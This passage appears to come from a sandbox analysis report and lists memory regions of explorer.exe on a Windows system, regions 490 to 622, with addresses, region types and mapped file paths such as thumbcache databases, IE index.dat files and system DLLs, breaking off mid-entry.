entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 490 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 491 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 492 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 493 start_va = 0x3670000 end_va = 0x3670fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 494 start_va = 0x3680000 end_va = 0x3681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003680000" filename = "" Region: id = 495 start_va = 0x3690000 end_va = 0x369ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 496 start_va = 0x36a0000 end_va = 0x36a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 497 start_va = 0x36b0000 end_va = 0x36bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 498 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 499 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 500 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 501 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 502 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 503 start_va = 0x3710000 end_va = 0x3717fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 504 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 505 start_va = 0x37a0000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 506 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 507 start_va = 0x3800000 end_va = 0x3800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 508 start_va = 0x3810000 end_va = 0x3810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 509 start_va = 0x3820000 end_va = 0x3821fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 510 start_va = 0x3830000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 511 start_va = 0x38b0000 end_va = 0x38b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038b0000" filename = "" Region: id = 512 start_va = 0x38c0000 end_va = 0x38cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021120220211203\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021120220211203\\index.dat") Region: id = 513 start_va = 0x38d0000 end_va = 0x38d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 514 start_va = 0x38e0000 end_va = 0x38e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 515 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038f0000" filename = "" Region: id = 516 start_va = 0x3900000 end_va = 0x3904fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003900000" filename = "" Region: id = 517 start_va = 0x3910000 end_va = 0x3911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003910000" filename = "" Region: id = 518 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003920000" filename = "" Region: id = 519 start_va = 0x3980000 end_va = 0x3980fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 520 start_va = 0x3990000 end_va = 0x3994fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 521 start_va = 0x39a0000 end_va = 0x39a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 522 start_va = 0x39b0000 end_va = 0x39b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 523 start_va = 0x39c0000 end_va = 0x3a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 524 start_va = 0x3a40000 end_va = 0x3a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 525 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 526 start_va = 0x3ad0000 end_va = 0x3ad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ad0000" filename = "" Region: id = 527 start_va = 0x3ae0000 end_va = 0x3ae6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 528 start_va = 0x3af0000 end_va = 0x3af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 529 start_va = 0x3b00000 end_va = 0x3b01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b00000" filename = "" Region: id = 530 start_va = 0x3b10000 end_va = 0x3b11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 531 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 532 start_va = 0x3bb0000 end_va = 0x3bd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 533 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 534 start_va = 0x3bf0000 end_va = 0x3bf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 535 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 536 start_va = 0x3c80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 537 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 538 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 539 start_va = 0x3cb0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 540 start_va = 0x3d30000 end_va = 0x3d30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 541 start_va = 0x3d40000 end_va = 0x3d40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 542 start_va = 0x3d50000 end_va = 0x3d67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 543 start_va = 0x3d80000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 544 start_va = 0x3e00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 545 start_va = 0x4070000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 546 start_va = 0x4110000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 547 start_va = 0x4190000 end_va = 0x4592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 548 start_va = 0x45a0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 549 start_va = 0x4620000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 550 start_va = 0x46c0000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 551 start_va = 0x4750000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 552 start_va = 0x47d0000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 553 start_va = 0x48b0000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 554 start_va = 0x49a0000 end_va = 0x5cf4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 555 start_va = 0x5d80000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 556 start_va = 0x5dd0000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 557 start_va = 0x5e50000 end_va = 0x5f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 558 start_va = 0x5f50000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 559 start_va = 0x62c0000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 560 start_va = 0x6340000 end_va = 0x63bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 561 start_va = 0x6470000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 562 start_va = 0x64c0000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 563 start_va = 0x6500000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 564 start_va = 0x65f0000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 565 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 566 start_va = 0x6810000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 567 start_va = 0x68b0000 end_va = 0x692ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 568 start_va = 0x6a00000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 569 start_va = 0x6a90000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 570 start_va = 0x6b20000 end_va = 0x6b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b20000" filename = "" Region: id = 571 start_va = 0x6c00000 end_va = 0x6c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 572 start_va = 0x6c80000 end_va = 0x6daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 573 start_va = 0x6e80000 end_va = 0x6f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 574 start_va = 0x6fa0000 end_va = 0x701ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 575 start_va = 0x7090000 end_va = 0x748ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007090000" filename = "" Region: id = 576 start_va = 0x7490000 end_va = 0x758ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 577 start_va = 0x7590000 end_va = 0x768ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 578 start_va = 0x76f0000 end_va = 0x776ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076f0000" filename = "" Region: id = 579 start_va = 0x7840000 end_va = 0x78bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007840000" filename = "" Region: id = 580 start_va = 0x78c0000 end_va = 0x79bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 581 start_va = 0x79c0000 end_va = 0x7abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 582 start_va = 0x7b20000 end_va = 0x7c1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 583 start_va = 0x7c20000 end_va = 0x7d1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 584 start_va = 0x7d30000 end_va = 0x7daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d30000" filename = "" Region: id = 585 start_va = 0x81a0000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 586 start_va = 0x82a0000 end_va = 0x839ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 587 start_va = 0x83c0000 end_va = 0x843ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083c0000" filename = "" Region: id = 588 start_va = 0x8440000 end_va = 0x9794fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 589 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 590 start_va = 0x75410000 end_va = 0x754f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 591 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 592 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 593 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 594 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 595 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 596 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 597 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 598 start_va = 0xff120000 end_va = 0xff3dffff monitored = 0 entry_point = 0xff14b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 599 start_va = 0x7fef0300000 end_va = 0x7fef03d6fff monitored = 0 entry_point = 0x7fef0301074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 600 start_va = 0x7fef0450000 end_va = 0x7fef05a3fff monitored = 0 entry_point = 0x7fef0457d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 601 start_va = 0x7fef0950000 end_va = 0x7fef0a15fff monitored = 0 entry_point = 0x7fef095f220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 602 start_va = 0x7fef0b80000 end_va = 0x7fef0bbafff monitored = 0 entry_point = 0x7fef0b81238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 603 start_va = 0x7fef0c30000 end_va = 0x7fef0c4efff monitored = 0 entry_point = 0x7fef0c357b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 604 start_va = 0x7fef2bd0000 end_va = 0x7fef2d0bfff monitored = 0 entry_point = 0x7fef2bd197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 605 start_va = 0x7fef2d10000 end_va = 0x7fef2dacfff monitored = 0 entry_point = 0x7fef2d9d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 606 start_va = 0x7fef2db0000 end_va = 0x7fef2e86fff monitored = 0 entry_point = 0x7fef2db1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 607 start_va = 0x7fef2e90000 end_va = 0x7fef2ec0fff monitored = 0 entry_point = 0x7fef2e91b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 608 start_va = 0x7fef2ed0000 end_va = 0x7fef2f24fff monitored = 0 entry_point = 0x7fef2ed26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 609 start_va = 0x7fef2f30000 end_va = 0x7fef2faefff monitored = 0 entry_point = 0x7fef2f31070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 610 start_va = 0x7fef2fb0000 end_va = 0x7fef3071fff monitored = 0 entry_point = 0x7fef2fd04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 611 start_va = 0x7fef3080000 end_va = 0x7fef32aafff monitored = 0 entry_point = 0x7fef3081f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 612 start_va = 0x7fef32b0000 end_va = 0x7fef3303fff monitored = 0 entry_point = 0x7fef32b104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 613 start_va = 0x7fef3310000 end_va = 0x7fef3ec6fff monitored = 0 entry_point = 0x7fef3311bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 614 start_va = 0x7fef3ed0000 end_va = 0x7fef3f84fff monitored = 0 entry_point = 0x7fef3ef1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 615 start_va = 0x7fef3f90000 end_va = 0x7fef3fe7fff monitored = 0 entry_point = 0x7fef3f930f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 616 start_va = 0x7fef3ff0000 end_va = 0x7fef4034fff monitored = 0 entry_point = 0x7fef3ff4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 617 start_va = 0x7fef4040000 end_va = 0x7fef404cfff monitored = 0 entry_point = 0x7fef4047104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 618 start_va = 0x7fef4050000 end_va = 0x7fef40adfff monitored = 0 entry_point = 0x7fef408a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 619 start_va = 0x7fef40b0000 end_va = 0x7fef40b6fff monitored = 0 entry_point = 0x7fef40b1b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 620 start_va = 0x7fef40c0000 end_va = 0x7fef40dffff monitored = 0 entry_point = 0x7fef40c1010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 621 start_va = 0x7fef40e0000 end_va = 0x7fef411efff monitored = 0 entry_point = 0x7fef40e12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 622 start_va = 0x7fef4330000 end_va = 0x7fef434efff monitored = 0 entry_point = 